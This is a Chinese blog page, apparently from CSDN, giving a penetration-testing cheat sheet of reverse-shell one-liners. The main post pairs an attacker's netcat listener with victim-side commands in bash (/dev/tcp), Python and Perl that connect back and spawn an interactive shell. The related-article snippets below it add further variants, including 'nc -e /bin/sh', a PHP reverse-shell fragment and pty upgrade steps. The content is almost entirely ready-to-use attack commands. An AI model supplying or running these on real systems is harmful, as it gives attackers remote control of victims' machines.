linux 渗透 密码,linux渗透中常用命令+Tip

最新推荐文章于 2021-11-06 22:59:36 发布
最新推荐文章于 2021-11-06 22:59:36 发布
阅读量180 收藏
点赞数
文章标签: linux 渗透 密码

1. bash

attacker 监听

nc -lvvp 4444

victim 运行

bash -i >& /dev/tcp//4444 0>&1

2. python

attacker 监听

nc -lvvp 4444

victim 运行

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

3. perl脚本

perl -e 'use Socket;$i="";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

简内特
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4541
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linuxnc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
tiptop erp linux和oracle培訓PPT
07-30
tiptop erp linux和oracle培訓PPT,很不錯的學習資料
Linux下NC反弹shell命令(推荐)
09-15
主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
渗透测试之反弹代理(socks代理) (Earthworm工具) (windows和linux的代理)
broing55的博客
03-18 2090
反弹代理 内网渗透不光只是反弹一个shell,反弹一个端口,我们更需要对内网进行更深一步的扫描和渗透,这时候就需要设置找到一个代理服务器,充当外网和内网数据转发的节点。 所以出现了反弹代理,也叫反弹socket。 使用工具:ew,支持http,https等代理 Socks代理 全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp...
PHP反弹Cmd/Shell 脚本
gazhichen的专栏
12-07 2073
遇到大马无法反弹时可以试试,linux,windows均可反弹 error_reporting (E_ERROR); ignore_user_abort(true); ini_set('max_execution_time',0); $os = substr(PHP_OS,0,3); $ipaddr = 'xxx.xxx.xxx.xxx'; $port = '443'; $d
反弹shell
stonesharp的专栏
04-03 3365
各种反弹shell的方式 - R00tGrok 时间 2014-04-06 23:27:00  博客园精华区原文  http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html [前言:在乌云社区看到反弹shell的几种姿势,考虑到乌云社区不完全对外开放,干脆自己转一下以作分享,另外还收集了点其他的,应该较为全面
ERP(tiptop linux下主要命令).docx
09-13
...
ERP(tiptop linux下主要命令).pdf
09-13
...
tip linux串口调试工具 C语言源码 ARM开发工具
06-03
源文件有些行标没删掉。。。 Usage: tip [-?heonxrwcqt125678] [-s speed] [-w file] [-p tcpport] [-l device] [device] -h? this help -q quiet mode (no helpful messages) -1 1 stop bits (default) -2 2...
一张图记住常用 Linux 系统性能诊断工具
10-29
iostat tiptop netstat sar mpstat
Linux一句话反弹Shell细说
一杯咖啡的渗透记忆
08-11 446
简介 我们在渗透测试的过程经常会遇到linux主机环境,而在获取linux主机shell是我们经常需要做的是工作内容之一,其经常会遇到以下几个场景。 一、场景一 我们已经拿下主机的一个webshell,我们想获取一个可以直接操作主机的虚拟终端,此时我们首先想到的是开启一个shell监听,这种场景比较简单,我们直接使用使用nc即可开启,如果没有nc我们也可以很轻松的直接下载安装一个,具体开启监听的命令如下。 1.1 安装netcat 这里需要注意一点默认的各个linux发行版本已经自带了ne
c语言编写反弹shell源码,渗透不会反弹shell?来教你写一个cmd的shell
weixin_39942474的博客
05-22 707
原创 lengyi 合天智汇包含的库:#include #include #include #include #include #pragma comment(lib, "Ws2_32.lib")#define DEFAULT_BUFLEN 1024winsock2和ws2tcpip两个库文件是用来初始化网络套接字的。windows用来初始化一些windows下的函数,string方便我们后面的...
反弹shell的多种方式
课嗨教育的专栏
04-03 315
升级成半交互式 tty python -c 'import pty; pty.spawn("/bin/bash")' 升级成完全交互式 tty,能用方向键 + tab,就是退出比较麻烦。 python -c 'import pty; pty.spawn("/bin/bash")' Ctrl + Z stty raw -echo fg reset Bash Tested on Ubuntu 10.10 /bin/bash -i >& /dev/tcp/10.10.14.1/44
msf反弹php shell,反弹shell总结
weixin_42502419的博客
03-22 445
1.bash反弹bash -i >& /dev/tcp/ip_address/port 0>&12.nc反弹nc -e /bin/sh 192.168.2.130 44443.pythonimport socket,subprocess,oss =socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(( "1...
linux 渗透 反弹shell,反弹shell的n种姿势
weixin_36269334的博客
05-13 253
天天被ven师傅吐槽不会日站,然后又看着乐师傅日站,感觉自己好他妈菜,也是时候补一波渗透测试里的一些东西了,虽然我也知道是炒冷饭,但是还是要持续更新,收录一些反弹shell的常规套路和奇淫巧技。当然知其然知其所以然,也会有一些对于相关命令的解析,方便每个渗透测试工作者可以很好的利用,而不是当成exp一样去打bash在各种各样的文章里最最常见的一种,但是需要注意的是,往往在一些渗透测试并不适用,具...
Linux下内网反弹技巧总结与杂谈
u014389734的博客
07-08 1028
靠谱点的公司都不会将应用服务器直接对外,而是通过代理转发或映射等方式对外,当可以执行命令的服务器能够访问公网(这个要看具体情况,比如需要加载公网资源或者其他需求)时,反连技巧就会派上用场。通常,在做渗透的时候会“运气好”,碰到某些应用上存在远程命令执行漏洞,近来由于java反序列化和二进制类漏洞的层出不穷,也加持着这种漏洞越发增多。一般来说,靠谱点的公司都不会将应用服务器直接对外,而是通过代理转发...
反弹shell的N种姿势
weixin_42478365的博客
11-06 356
前言 在渗透测试的过程,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。 0x01 Bash反弹 1.1 方法一 击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0>&1 #bash -i 打开一个交互的bash #>
内网渗透-反弹Shell
道阻且长,行则将至。
07-07 3157
概述 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、we
使用python和bash反弹shell的方法详解
weixin_45588247的博客
07-20 2960
实验名称:实验(反向反弹) 实验环境: 攻击(攻击者)主机: Kali2020.2 虚拟机 nat 192.168.254.132 目标(受害者)主机: Centos_6.0...
怎么确认 linux 有没有tip
最新发布
07-13
你可以使用以下命令来确认Linux系统是否安装了"tip"命令: ``` $ which tip ``` 如果你在终端运行该命令,并且没有显示任何输出,那么很可能系统没有安装"tip"命令。如果安装了"tip"命令,它将显示该命令的完整...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值